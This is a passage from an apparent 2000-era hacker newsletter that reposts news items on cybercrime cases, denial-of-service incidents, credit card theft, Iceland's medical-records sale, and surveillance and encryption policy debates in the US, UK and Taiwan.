      Gatsby" will spend 18 months in federal prison.


      A judge in San Diego has sentenced Jonathan Bosanac for
      electronically breaking into some of the country's largest computer
      systems.
      
      The judge said his wrongdoing caused more than $1 million in damage 
      to one company alone. Bosanac was ordered to pay $10,000 in restitution
      to three telephone companies he hacked into.
      
      He pleaded guilty in December to participating in one of the nation's 
      biggest hacking schemes.
      
      The crimes took place more than five years ago. Friends say the man's 
      life has since turned around. He's been working as a computer consultant.  
      
      @HWA
      
125.0 HNN:Mar 6th: Cyber Intrusion Used to Cover Up Software Glitch 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evenprime 
      Last week's alleged DoS attack on National Discount
      Brokers was later determined to be a third-party
      software incompatibility. Chairman Dennis Marino said
      last week the site outages "had the earmarks of a
      hacker attack." (Our sites down? We must be under
      attack!) 

      Reuters - via ZD Net
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2455264,00.html?chkpt=p1bn
      
      Wired       
      http://www.wired.com/news/business/0,1367,34719,00.html
      
      Reuters:
      
      Mar 3, 2000 4:51 AM PT
      Web trading site blames hackers -- sort of
      
      National Discount Brokers Group Inc. said periodic disruptions since last
      Thursday to its site at http://www.ndb.com were the result of software 
      incompatibility with products of an outside company. The explanation 
      appeared to step back from comments by a company executive when the 
      disruptions began at the NDB.com site last week. At that time, Chairman
      Dennis Marino said the site outages "had the earmarks of a hacker attack."
      As a result of what it now said was software conflicts, the company said
      its NDB.com site had been subjected to "several instances of hacker-like 
      denial of services" that precluded some of the company's customers from 
      reaching the Web site. -- Reuters
      
      -=-
      
      Wired;
      
      Hacked by Flawed Software 
      Reuters 
      
      7:25 a.m. 3.Mar.2000 PST 
      NEW YORK -- Hacker attacks can be used to explain a host of Internet ills. 
      
      Online brokerage National Discount Brokers Group Inc. on Thursday gave new 
      definition to the latest criminal phobia by blaming recent outages at its 
      online trading site on "hacker-like" attacks by an unnamed Web software maker. 
      
      
      In a statement, the Jersey City, N.J.-based online share dealer said periodic
      disruptions since last Thursday to its site were the result of software 
      incompatibility with products of the outside company. 
      
      The explanation appeared to step back from comments by a company executive 
      when the disruptions began at the NDB.com site last week. At that time, 
      Chairman Dennis Marino said the site outages "had the earmarks of a hacker
      attack." 
      
      As a result of what it now said was software conflicts, the company said its
      NDB.com site had been subjected to "several instances of hacker-like denial 
      of services" which precluded some of the company's customers from reaching the
      Web site. 
      
      NDB said it was mulling legal action against the company. 
      
      By contrast, last month's assaults on major Web sites such as Yahoo! Inc., 
      eBay Inc. and ETrade Group Inc. were widely believed to have involved the 
      more conventional explanation of hacker attacks: computer break-ins by 
      Internet vandals. 
      
      Through a method known as "denial of service," hackers set up automatic 
      programs that bombard Web sites with so many information requests that 
      legitimate users cannot log on, law enforcement officials have said. 
      
      National Discount said it had been in contact with the software maker and
      is working to correct the problems with the software program but that it 
      was also seeking "appropriate judicial relief." 
      
      On the busiest day of Web site attacks in February, Datek Online Holdings 
      Corp., another online broker, had initially joined the chorus of companies 
      blaming hackers for the site's disruptions. 
      
      However, it later retracted the comments and said the outage was caused by
      an equipment breakdown by an outside network supplier. The 35-minute outage
      occurred at the opening of U.S. stock markets, a peak usage period for
      trading sites. 
      
      In its own explanation, a spokesman for National Discount declined to go 
      beyond the wording of its news release and referred calls to the company's
      legal counsel. The in-house lawyer did not immediately return calls seeking
      comment.
      
      NDB said the situation had resulted in an overall periodic slowdown of Web
      site performance as well as delays in reaching customer service agents and
      registered representatives, crucial issues for a business built around quick
      trading transactions. 
      
      This could help explain why average transaction processing time at NDB for 
      the week of February 22-25 ranked at the bottom of an index of 16 Web broker
      sites compiled by Keynote Systems Inc., a company that tracks Web site
      performance. 
      
      According to Keynote's weekly Web Broker Trading Index, NDB customers had to
      wait an average of 43.9 seconds to reach National Discount's site, twice as 
      slow as the next slowest online trading site. 
      
      National Discount stressed that at no time during these incidents was any
      customer account accessed and no customer account information was affected.
      The outage meant its 200,000 customers could not funnel stock orders
      through the firm's Web site, although they could relay orders over the phone. 
      
      The company said that it had determined the cause of the service outages by
      working with law enforcement officials, regulatory agencies and NDB.com's 
      in-house technology staff. 
      
      NDB has also instituted a number of additional anti-hacking measures on its
      computer systems, it said. 
      
      Copyright (c) 1999-2000 Reuters Limited. 
      
      @HWA
      
126.0 HNN:Mar 6th: Microsoft Hit in Israel 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acopalyse 
      Internet Gold, an Israeli ISP, said Sunday that cyber
      vandals had briefly paralyzed the new Microsoft Corp.
      web site on Saturday. www.msn.co.il was evidently hit
      with so much traffic that access was slowed for about
      an hour. Evidently the attack was aimed at a separate
      site and was only being channeled through the Microsoft
      site. (There is a severe lack of information in this
      article.) 

      Reuters - via ZD Net       
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2456092,00.html?chkpt=p1bn
      
      Mar 5, 2000 11:07 AM PT
      Hackers attack MS site in Israel
      
      JERUSALEM -- Israeli ISP Internet Gold said Sunday hackers had briefly
      paralyzed its new site with Microsoft Corp. on Saturday. Internet Gold
      CEO Eli Holtzman, said hackers bombarded Microsoft's new Israeli site,
      www.msn.co.il, with so much traffic that it slowed access for about an hour.
      He said hackers had channeled the traffic through Internet Gold with the
      aim of harming another Web site, which he declined to name, located 
      outside Israel. "We are in contact with (the company) to prevent such an
      event in the future," Holtzman told Reuters. He would not say whether 
      the attack came from inside Israel or from abroad, but he stressed that
      the cyber invasion broke through a single unprotected Internet gateway 
      and did not collapse network security barriers. In February, a wave of 
      hacker attacks took down half a dozen popular Internet sites. -- Reuters 
      
      @HWA
      
127.0 HNN:Mar 6th: Credit Card Numbers Used in Scam 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
 
      contributed by acopalyse 
      Italian Giuseppe Russo, 34, and his wife, Croatian
      Sandra Elazar, 33, have been arrested in Sicily after
      obtaining the numbers to some 1,000 credit cards and
      going on a costly spending and gambling spree. They
      used the cards over several months and recently began
      to play the lottery to transform the credit into cash.
      They gambled away 1.5 billion lire (S$1.3 million), and
      the winnings were paid into bank accounts. 

      The Straits Times       
      http://www.straitstimes.asia1.com/world/wrld13_0306.html
      
      
      Net to steal 1,000 credit
      card numbers 
      
      ROME -- Two cyber pirates have been arrested in
      Sicily after using the Internet to access about 1,000 US
      credit-card numbers and going on a costly spending
      and gambling spree, Italy's financial watchdog has said.
      
      Italian Giuseppe Russo, 34, and his wife, Croatian
      Sandra Elazar, 33, started the scam after obtaining the
      numbers of some 1,000 credit cards from a Chase
      Manhattan bank and a Citibank Universal branch in the
      US.
      
      Over several months they went on a binge via the
      Internet. But in the last month, the pair began to play
      the lottery to transform the credit into cash. They
      gambled away 1.5 billion lire (S$1.3 million), and the
      winnings were paid into bank accounts. -- AFP 
       
      @HWA
      
128.0 HNN:Mar 6th: Iceland Sells Its Soul 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Dan 
      The medical and genealogy records of every man,
      woman and child within Iceland are now the property of
      a private medical research company known as DeCode.
      It is hoped that the records will help researchers to
      fight disease. Critics worry about the loss of privacy and
      possible breaching of doctor-patient confidentiality. 

      CNN 
      http://www.cnn.com/2000/WORLD/europe/03/03/iceland.genes/index.html       
      
      Iceland sells its medical records,
      pitting privacy against greater
      good

      March 3, 2000
      Web posted at: 4:09 a.m. EST (0909 GMT)

      From staff reports

      REYKJAVIK, Iceland (CNN) -- Iceland has
      sold the medical and genealogy records of
      its 275,000 citizens to a private medical
      research company, turning the entire nation
      into a virtual petri dish in hopes of finding
      cures to diseases that have afflicted humans
      for ages. 

      But the promise of curing disease hasn't
      stopped critics from worrying about privacy
      issues created by the sale and storage of personal medical and genetic records. 

      "In our company," said Kari Stefansson of DeCode, the U.S.-funded firm which
      bought the records, "we have the genealogy of the entire people for 1,000 years back
      in time and a computerized record of who is related to whom." 

      The Icelandic population's unique ability to trace its family trees back to the island
      nation's first settlers, makes it a prime candidate for this never before attempted
      mammoth research experiment. 

      Stefansson says these detailed records make Iceland the ideal laboratory for tracing
      the flow of genetic information from one generation to another. 

      He's betting that a vast, centralized data bank of medical and genetic records might
      offer clues to why certain people tend to develop specific maladies, perhaps offering
      the world a chance to understand the diseases and then develop cures for them. 

      But many members of Iceland's medical community are concerned that allowing the
      nation's genetic information to be sold will breach the trust between doctor and
      patient. 

      Some physicians fear their patients might not be as forthcoming about personal
      information, knowing that it would eventually be stored in the centralized data bank. 

      The government has allayed those fears somewhat by allowing citizens to opt out of
      the genealogical data base. So far, only about 5 percent of Icelanders have chosen not
      to participate. 

      Other critics are confident the project will fail because, they say, so many doctors are
      against it. They're predicting physicians will refuse to comply with the law that
      requires them to deliver new data to the genetic data bank. 

      Stefansson, a former Harvard professor, offered his own explanation why Iceland
      should support the experiment. 

      "Recognize that knowledge is never evil in of itself," he said. "If you run the world by
      forbidding new discoveries, you are controlling the world in an unpredictable manner.
      You are putting yourself in the position of God." 

      Correspondent Jerrold Kessell contributed to this report.
      
      @HWA
      
129.0 HNN:Mar 6th: Clinton Says No To Email 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by richardm 
      When asked if he talked with his daughter Chelsea via
      Email while she was in college, US President Bill Clinton
      replied "I don't do e-mail with Chelsea, Absolutely not --
      I don't think it's secure." (Evidently online privacy
      carries a little more weight with Bill than I thought.) 

      San Jose Mercury News       
      http://www.mercurycenter.com/business/top/047783.htm
                                                          

      Posted at 10:33 p.m. PST Friday, March 3, 2000 

      `I don't do e-mail with Chelsea'

      BY DAN GILLMOR
      Mercury News Technology Columnist 

      All over America, parents exchange e-mail with their children when the
      kids head off to college. Meet one parent who doesn't: Bill Clinton.

      ``I don't do e-mail with Chelsea,'' the president said after a speech
      Friday. ``Absolutely not -- I don't think it's secure.''

      That's a shame for the first family, which is clearly in a category by
      itself when it comes to security. But in an odd way, the rest of us can
      draw some comfort from Clinton's worries. When online privacy
      becomes a personal issue for the president of the United States, maybe
      we're closer to a day when privacy will reach the position it deserves
      on the public agenda.

      Clinton elevated the subject in his remarks to the Aspen Institute's
      Forum on Communications & Society, which met in San Jose on
      Friday. He spoke of the genuine, justified angst gnawing at regular folks
      who don't trust businesses and governments to keep their most personal
      information private.

      Trust is earned in this world. There are some responsible members of
      the online community, companies and sites that go to great lengths to
      protect the privacy of Web surfers and shoppers. But the bad actors,
      who troll for personal information so they can manipulate and trade it,
      mock the self-regulation so many in the Net community say is the
      answer.

      So when Clinton called -- albeit tentatively -- for laws protecting the
      privacy of individuals' online medical and financial information, as well
      as all children's activities, he surely struck a resonant chord with
      average people.

      A zone of privacy is central to the American way of life, he said with
      absolute accuracy, ``and we give it up at our peril.''

      Welcome words. But they come in a context that invites some
      skepticism.

      The Clintons could enjoy an entirely private e-mail correspondence right
      now. They'd need to use strong encryption, the scrambling of data so
      that it can't be understood even if intercepted. But this president, taking
      the advice of law enforcers and spies, has done everything in his power
      to discourage the widespread use of strong encryption. He constantly
      uses strong encryption in his voice and data communications with
      military officials, no doubt, but the fact that he apparently hasn't even
      considered it for family e-mail is testament to the government's
      paranoia that regular folks, not just criminals, might truly protect their
      own privacy in this way.

      His other problem is part technical and part social. The president would
      have to trust that someone wasn't reading his daughter's e-mail once it
      had been unscrambled on her computer, either over her shoulder or by
      jacking into that computer through the network to which it's attached.

      He surely trusts his daughter. But as he also noted in his speech Friday,
      it's unclear whether any of us can trust the network. The tech industry
      has some distance to travel in that direction.

      The administration has also been tone-deaf -- and that's a charitable
      description -- to civil liberties. This president and his top appointees
      have again and again supported legislation that has eroded the Bill of
      Rights and other fundamental liberties.

      In the privacy arena, too, the Clinton team has been less than faithful to
      the notions the president floated on Friday. When it issued regulations
      about the privacy of medical records last fall, the administration talked a
      great game. But the fine print didn't match the rhetoric. 

      The White House record on financial data doesn't give privacy
      advocates the warm and fuzzies, either. It has, for example, carried
      water for big business by lobbying against the European Union's worthy
      efforts to apply its data-privacy laws to American companies doing
      business in Europe. Meanwhile, the administration has been the chief
      cheerleader for the discredited notion that industry can regulate itself on
      these matters.

      Clinton offered a politician's hedge even as he pushed privacy. We
      don't want to kill the golden goose of technology, he said, implying that
      ensuring privacy rights could be so bad for business that we might have
      to abandon the idea.

      That said, there was genuine progress in Clinton's words Friday, a day
      after DoubleClick Inc., the Internet-advertising company, loudly
      postponed plans to expand its business in ways that amounted to
      unprecedented surveillance of individual Web users. I wonder if the
      timing was entirely a coincidence.

      The president's chief achievement Friday was to put the issue in the
      context of real people -- that is, real voters whose worries become the
      worries of politicians who want to be elected or re-elected. Even in an
      era when ``one person, one vote'' has morphed toward the sickening
      notion of ``one dollar, one vote'' the concerns of real people do matter.

      Let's assume the administration will push the right kind of laws. Will
      Congress act? I asked him that question after the speech.

      ``I kind of think we'll get legislation this year,'' Clinton said.


      Dan Gillmor's column appears each Sunday, Tuesday and Friday.
      Visit Dan's online column, eJournal
      (weblog.mercurycenter.com/ejournal). E-mail:
      dgillmor@sjmercury.com; phone (408) 920-5016; fax (408)
      920-5917. PGP fingerprint: FE68 46C9 80C9 BC6E 3DD0 BE57
      AD49 1487 CEDC 5C14.
      
      @HWA

130.0 HNN:Mar 7th:FidNet is Not Enough 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acopalyse 
      Testifying before the Senate Governmental Affairs
      Committee, Government and Defense Information
      Systems Director Jack Brock said that the NIPC plan of
      a Federal Intrusion Detection Network is flawed. He
      went on to say that good security is a direct result of
      good information management and that band-aid
      solutions such as FidNet will fail unless management is
      fixed. 

      The Register UK 
      http://www.theregister.co.uk/000306-000025.html
      
 
      SATURDAY MARCH 11TH 2000  

      Posted 06/03/2000 8:44pm by Thomas C. Greene in Washington

      Congressional study rejects Clinton's IT security Czar, FIDNET

      The President's scheme to bolster US government computer security by 
      appointing an information security Czar, and developing an automated 
      monitoring system to expand intrusion detection known as FIDNET, is 
      misguided, General Accounting Office (GAO) Government and Defence 
      Information Systems Director Jack Brock told Congress last week. 

      "The specific criticism we have of the President's plan is that it focuses 
      so much on intrusion detection you begin to get the impression that it was 
      the primary means they have of improving the federal government's computer 
      security programme," Brock said in testimony before the Senate 
      Governmental Affairs Committee. 

      The GAO is an investigative body which reviews and audits the federal 
      bureaucracy on behalf of Congress. It recently looked into computer and 
      information security procedures in numerous government bureaus. 

      The investigation revealed widespread security failures, most of which 
      derive from poor management. One doesn't find an agency with good 
      information management and bad security, just as one never sees an agency 
      with poor management and good security, Brock observed. 

      Allowing the Clinton Administration to address computer security as an 
      individual element of federal information management would be a mistake, 
      he insisted. Intrusion detection alone will do nothing to prevent data 
      security being compromised in the first place. A far more holistic 
      approach is needed, Brock believes. 

      "One agency that we've gone to at [the Environmental Protection Agency] 
      did a pretty good job of reporting and recording intrusions; but they did 
      a very bad job of doing anything to prevent those intrusions, or analyzing 
      those intrusions to take corrective action," Brock recalled. 

      In spite of the GAO's wisdom, the President last week ordered a review of 
      every federal agency to determine their vulnerability to cyber attack, 
      which will be administered by White House Chief of Staff John Podesta. The 
      prevention of distributed denial of service (DDoS) attacks "to make sure 
      that federal computers cannot be used by outsiders to attack others" would 
      be a priority, Clinton said. 

      The Clinton Administration appears to be indulging federal law enforcement 
      agencies which prefer an emphasis on intrusion detection and response, 
      simply because it assures them an increasingly prominent role in national 
      cyber security matters. 

      Obviously, if intrusion prevention were to improve dramatically, the 
      Department of Justice (DoJ), the FBI, and the National Infrastructure 
      Protection Center (NIPC) would have less justification to muck about in 
      cyberspace. 

      This would result in some reduction of bargaining power to attract federal 
      funds for cyber crime initiatives, to obtain expanded powers of 
      surveillance on line, and to reduce opportunities for Netizens to surf the 
      Web in complete anonymity, all of which are among the DoJ's highest 
      priorities right now. 

      The Register foresees little trouble for the DoJ in realising its 
      ambitions, however. Having observed the pace of common-sense innovation 
      among US government bureaus for several years now, we make it a safe bet 
      that a significant erosion of on-line privacy and liberties will have 
      taken place long before Uncle Sam stops making network intrusions a matter 
      of child's play.  
      
      @HWA
      
131.0 HNN:Mar 7th: RIP Bill Comes Under Fire In UK 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Lady Sharrow 
      The latest phase of making the UK the most tightly
      regulated country in the world takes place today. If
      enacted, the Regulation of Investigatory Powers (RIP) Bill
      would give far-reaching powers to the government and
      its agencies to snoop on private individuals. All UK
      readers are urged to lobby their MPs to retract this bill
      and implement the original freedom of information bill the
      government promised. 

      The Register UK
      http://www.theregister.co.uk/000306-000020.html
      
      Wired
      http://www.wired.com/news/politics/0,1283,34776,00.html
      
      The Stand - Campaigning For Safe E-Commerce Legislation
      http://www.stand.org.uk/
      
      Posted 06/03/2000 4:39pm by Tim Richardson

      Opposition mounts against UK's Big Brother Bill

      Parliament is today debating plans which will massively extend Government 
      snooping powers in Britain. 

      If adopted, the Regulation of Investigatory Powers (RIP) Bill would give 
      the Government the green light to snoop on private emails and mobile phone 
      conversations. 

      Those backing the Bill say the new measures simply bring new communication 
      technologies in line with regulations governing traditional telephony 
      services. 

      STAND.org.uk e-democracy campaigner Danny O'Brien said: "This Bill 
      contains ill-conceived proposals that will seriously damage UK ecommerce, 
      as well as threaten some basic civil liberties. 

      "Since the Government is trying to rush this legislation through 
      Parliament, we decided to use the Internet to speed up our campaign to 
      amend the worst bits of the Bill," he said. 

      STAND.org.uk has set up a WebFax service to enable Net users to lobby 
      their MP against the Bill. Follow the link above and you can participate 
      in this exercise in mass democracy. 

      Yaman Akdeniz, director of Cyber-Rights & Cyber-Liberties (UK), said: "The 
      RIP Bill is complex in nature and with its current state, there remains 
      serious problems with its compatibility with the Human Rights Act 1998. 

      "If enacted in its current form, it would only establish an intimidating 
      environment for the legitimate use of encryption products by the UK 
      citizens. 

      "Such legislation would no longer be compatible with the government policy 
      to make Britain the best place for ecommerce and network development. The 
      RIP Bill would be the first step towards the creation of a very hostile 
      place for network development. 

      "We cannot support such proposals, which we believe would be a serious 
      curtailment of important and well-established civil rights," he said. 

      Today the House of Commons is engaged in the second reading of the RIP 
      Bill. The Government hopes it will become an Act by October 2000.  

       
      -=-
      
      Wired; 
      
      
      U.K. Crypto Law a Key Issue 
      by Alan Docherty 
      
      3:00 a.m. 7.Mar.2000 PST 
      LONDON -- Law enforcement officials speaking to the House of Commons said
      criminals were using the Internet and without new powers those crimes 
      would go undetected by police. 
      
      Their comments came Monday as home secretary Jack Straw announced the second
      reading of the Regulation of Investigatory Powers Bill. The measure would 
      update legislation and give more power to law enforcement agencies to
      intercept electronic communications. 
      
      Opponents claimed specific sections of the updated legislation made users 
      guilty until proven innocent. 
      
      Opposition speaker Ann Widdecombe, shadow home secretary, said the bill 
      had good parts and the Conservative Party accepted the need to regulate 
      surveillance. 
      
      However, Section 49 of the bill was considered unacceptable by Widdecombe
      and many others. The section enables law enforcement agencies to serve 
      notices demanding that intercepted emails be decrypted. The bill puts the onus
      on Net users to prove they do not have the key or have lost it. 
      
      Simon Hughes, health and social welfare spokesman for the Liberal Democrats, 
      also supported the need for a new bill, but asked that the legislation have a
      more even balance between the power and rights of the state and the power
      and liberties of individuals. He said that in the current bill the government
      had gone too far. 
      
      Widdecombe said she thought the bill was "probably in breach of the ECHR 
      (European Convention of Human Rights)." 
      
      Yaman Akdeniz, director of Cyber Rights & Cyber Liberties agreed the bill was
      likely to breach the ECHR and that unless it was changed, it would make the 
      UK an undesirable location for e-commerce. The Labour government has set the
      target of making the UK the best environment for electronic business by 2002. 
      
      Caspar Bowden of the Foundation for Information Policy Research was hopeful 
      the Home Office would consider the arguments from opposition and back bench 
      Labour MPs. 
      
      "Government was clearly surprised by the breadth and force of objections to 
      the structure and details of almost every part of the bill," Bowden said. "We
      will have to see whether they respond positively to these powerfully expressed
      criticisms during the amendment phase." 
      
      Internet Freedom's Chris Ellison was less hopeful. 
      
      "The RIP Bill does nothing to regulate the powers of the police. Rather it 
      extends them," he said. "The real victims will not be criminals who become Net
      users, but Net users who will become criminals as a consequence of the removal
      of their presumed innocence." 
      
      @HWA
      
      
132.0 HNN:Mar 7th:Curador Returns With More CC Numbers 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      Claiming he has been on vacation for the past week or
      so Curador has returned and now boasts more than
      23,000 credit card numbers that have been lifted from
      at least eight different e-commerce sites. At several of
      the sites Curador has used a security hole in Microsoft's
      Internet Information Server software which allows the
      download of customer transaction records. Microsoft
      created a patch for the hole in 1998. 

      USA Today 
      http://www.usatoday.com/life/cyber/tech/cth502.htm
      <article vanished!>
      
      @HWA
      
133.0 HNN:Mar 7th:Taiwan Fears Computer Attack From China 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acopalyse 
      The head of Taiwan's National Security Bureau
      information division, Chang Kuang-yuan, said that while
      there was no evidence of a planned attack, the island's
      computers should be well protected for such an
      eventuality. It is feared that China may attempt to
      disrupt Taiwan's March 18 presidential election with
      various cyber attacks. 

      Virtual China
      http://www.virtualchina.com/news/mar00/030700-hacker-alo-jsl.html
      
      Reuters - via Yahoo      
      http://dailynews.yahoo.com/h/nm/20000307/wr/taiwan_internet_1.html
      
      
      VC;
      
      Taiwan Warns of Possible Computer War with Mainland

      By ALEXA OLESEN

      (Virtual China News -- Mar. 7) As China continued to sabre rattle in the
      run-up to Taiwan's second democratic elections, scheduled for Mar. 18, a
      Taiwanese official warned Monday that the island's computer systems may be
      at risk of being attacked by mainland Chinese hackers.

      Chang Kuang-yuan, head of Taiwan's National Security Bureau information
      division said that while there was no evidence of a planned attack, the
      island's computers should be well protected for such an eventuality.

      "No hacking at the moment does not suggest the possibility should be ruled
      out," Chang was quoted as saying by the Agence France Presse.

      Cross-Strait hacking fears were made a reality last fall when hundreds of
      attacks on Taiwanese computers were traced to computers on the mainland.
      The attacks ranged from sabotage, through the introduction of computer
      viruses, to the alteration of Web site content. Some were instigated by
      comments made by Taiwanese President Lee Teng-hui's calling for a
      state-to-state relationship between China and Taiwan.

      Taiwanese hackers responded in kind by hacking into mainland Chinese sites
      and posting the Taiwanese anthem and the Taiwanese flag.

      Chang told the press last year that the Taiwanese National Security Bureau
      had discovered 165 mainland Chinese Web sites as the sources of 72,000
      instances of hacking following Lee Teng-hui's comments. Victims of the
      attacks included Taiwanese government agencies such as the Pingtung
      County government Web site and the Construction and Planning
      Administration, as well as the Web sites of several universities.

      While some of those Web sites were government-operated it was unclear
      whether or not the hack attacks were orchestrated by the Chinese
      government or individual hackers according to Chang. 

      Playful Individuals

      "I think this is more of a side show than actual strategy on the part of
      mainland," said Stephen Yates, Senior Policy Analyst at the Heritage
      Foundation, a U.S. think-tank. "Recent hacking incidents are probably the
      work of playful individuals ... very intelligent and creative college students
      similar to the kind of people who would hack into a Pentagon Web site and put
      up 'No Nukes'," Yates said.

      Media reports, pro-Taiwan forces in the U.S., and Taiwanese officials have
      stressed Beijing's role in the hack attacks because they were traced to
      mainland computers and seemed to be conducted en masse. Observers also
      reason that because mainland China so closely regulates and monitors its
      computer network activity only government-sanctioned hackers would be able
      to accomplish Cross-Strait computer sabotage.

      However Chinese military expert James Mulvenon says that argument is
      seriously flawed and that anyone in China with computer access and the
      technical know-how could easily accomplish last August's hacking.

      "I've been in cybercafes in China. They don't enforce any regulation on
      registration," said Mulvenon, an associate political scientist at the Rand
      Corporation, another U.S. think-tank. "There are hacker tools sitting on the
      [computer] desktop and illegal proxy servers already installed. The network
      environment is wide open. It's not well controlled," he said.

      Heightened Awareness

      Experts say that hack attacks should be distinguished from Cross-Strait
      Information Warfare contingencies that both Taiwan and China are preparing
      for. Information Warfare is the offensive and defensive use of information and
      information systems to deny, exploit, corrupt, or destroy, an adversary's
      information, information-based processes, information systems, and
      computer-based networks while protecting one's own, according to Ivan K.
      Goldberg, the Director of the Institute for the Advanced Study of Information
      Warfare (IASIW).

      Chinese military officials have begun to regularly refer to the need for network
      security and recent regulations regarding the transmission of state secrets
      evidenced a heightened awareness to network computer espionage. Taiwan
      also has made similar statements.

      "China has put a lot of effort into building up its information capabilities in the
      past decade," Lin Ching-ching, the director of Taiwan's Electronic
      Communications and Information Bureau told reporters last August. "But
      Taiwan is also working on it. We are not as fragile as many people think," he
      said. 

      Taiwan's response to the August hack attacks was decidedly military in
      nature, despite the fact that there was no evidence that Beijing was behind
      them. In September, Taipei announced that it was stepping up its military
      training to better defend itself against any electronic warfare by China.

      The Taiwanese defense ministry went so far as to institute nine seminars
      focused on communication security and computer virus prevention.

      High Risk, Low Gain

      However, hacking is different from that level of Information Warfare.

      "There are no doubt real plans to make [computer network infiltration] an
      operational capability on both sides, but neither would want to demonstrate
      that capability. There is no incentive for them to show their hand," said
      Stephen Yates.

      Mulvenon echoed Yates' argument and added that not only would China be
      reluctant to show its cards but that it would also be tough for Beijing, as it
      would be for others, to have a very strong hand regarding Information
      Warfare.

      "People talk very glibly about Information Warfare against Taiwan but it's
      enormously difficult," Mulvenon said. "It's high risk and low gain, with a high
      blowback potential if it fails or you get caught. I would think they would feel
      more comfortable with ballistic missiles."

      Mulvenon did not fully discount Beijing's role in cross-Strait hacking, however.
      Admitting that there was no direct evidence indicating that the hack attacks
      were planned by the Chinese central government, he suggested that they
      could have been used as a handy diversion.

      "A reasonable hypothesis is that Beijing exploited teenage hooliganism by using
      that as a cover for carrying out interesting intelligence gathering," said
      Mulvenon.

      Taiwan, which split from the mainland in 1949 following a civil war is
      considered by Beijing to be a renegade province. Current mainland Chinese
      policy dictates that any moves by Taiwan toward being recognized
      internationally as an Independent nation will be countered with military attack.

      To reach Alexa Olesen: alexa@virtualchina.net
                
       -=-
                                                                  
       Reuters;
                                                                  
       Tuesday March 7 5:01 AM ET 

       Taiwan Says Ready If China Launches Internet Attack

       TAIPEI, Taiwan (Reuters) - Taiwan's military said on Tuesday it has set 
       up Internet defenses in the run up to the March 18 presidential election 
       after discovering more than 7,000 attempts by Chinese hackers to enter 
       the country's security systems.

       ``We have set up a round-the-clock monitor system and installed various 
       security programs and firewalls to keep the Chinese Communists from 
       trying to disrupt our networks,'' said Chang Chia-sheng, the defense 
       ministry's cyber information head.

       The military and security networks are independent with no links to the 
       Internet, making it difficult for Chinese hackers to sabotage, Chang 
       said.

       Taiwan's security authorities have discovered more than 7,000 recent 
       attempts by Chinese hackers to enter the island's security and military 
       systems through Internet Web sites, Chang said. He did not elaborate.

       A cyberwar between Taiwan and Chinese hackers broke out last year after 
       Taiwan President Lee Teng-hui called in July for bilateral ties to be 
       conducted on a ``special state-to-state'' basis, infuriating Beijing.

       China has heaped verbal threats, including Internet propaganda, in a 
       veiled warning against voting for pro-independence opposition candidate 
       Chen Shui-bian in the elections.

       Chang said China was technically capable of paralyzing the island's 
       computer networks, including the system at the vote tabulation center on 
       election day, if it wanted to disrupt the polls, but said such a move 
       would be difficult.

       ``Theoretically, it is possible, but it won't be easy,'' Chang said.

       China could swamp Taiwan government Web sites with huge megabytes of 
       electronic mail or e-mail bombs to overload them, he said.

       ``But we can always refuse access to our Web sites from any suspicious 
       Internet providers once we discover unusual access movements,'' Chang 
       said.

       Besides, Chang noted, Taiwan's vote tabulation network was independent of 
       the Web site of the Central Election Commission, making it difficult for 
       hackers to use the Web site to attack the vote network.

       Beijing regards Taiwan as a wayward province and has threatened to invade
       if the island declares independence. 
       
       @HWA
      
      
134.0 HNN:Mar 7th:Hong Kong Beefs Up Online Police Presence 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The Police Training School in Hong Kong has started
      teaching police officers how to fight computer crime.
      The Commercial Crime Bureau will increase staff of the
      computer crime section from 17 officers to at least 20
      and each of the 45 police divisions will have at least one
      computer crime trained officer assigned. 

      South China Morning Post       
      http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000306014052057.asp
      


      Monday, March 6, 2000
                             
      Police step up war on cyber crime
 
      MICHAEL WONG 
 
      At least one officer with computer-crime knowledge is to
      be drafted to each of the 45 police divisions as the
      problem grows. 
 
      The Police Training School has started teaching trainee
      constables and inspectors how to fight computer crime. 
 
      The computer-crime section of the Commercial Crime
      Bureau will increase staff from 17 officers to at least 20. 
 
      With Internet use growing worldwide, the force needed
      to improve its ability to counter computer crime, said
      bureau Senior Superintendent Peter Else. 
 
      Figures from the Office of the Telecommunications
      Authority show that the estimated number of Internet
      accounts grew from a little more than one million in June
      last year to 1.86 million by the year's end. 
 
      The number of computer crimes grew from 25 in 1997 to
      38 in 1998 and 266 last year. 
 
      These crimes included unauthorised access, Internet
      shopping fraud, publication of obscene material and
      criminal damage. 
 
      The bureau received 84 requests for computer forensic
      examination last year, up from 60 in 1998. 
 
      Mr Else said other types of computer crime such as
      criminal intimidation and "pump and dump" were
      emerging fast. 
 
      In "pump and dump", so far detected mainly in the United
      States, criminals buy junk bonds and shell companies'
      stocks at a minimal price and persuade Web site visitors
      to purchase them. 
 
      "Once their value has gone up, the criminals sell their
      own stocks for a profit," he said. 
 
      Since most crimes on the Internet could also be
      committed in the "real world", users must use the same
      degree of alertness in the cyber-world, said Mr Else. 
 
      With greater awareness and understanding, particularly
      by courts, about the seriousness of the problem, Hong
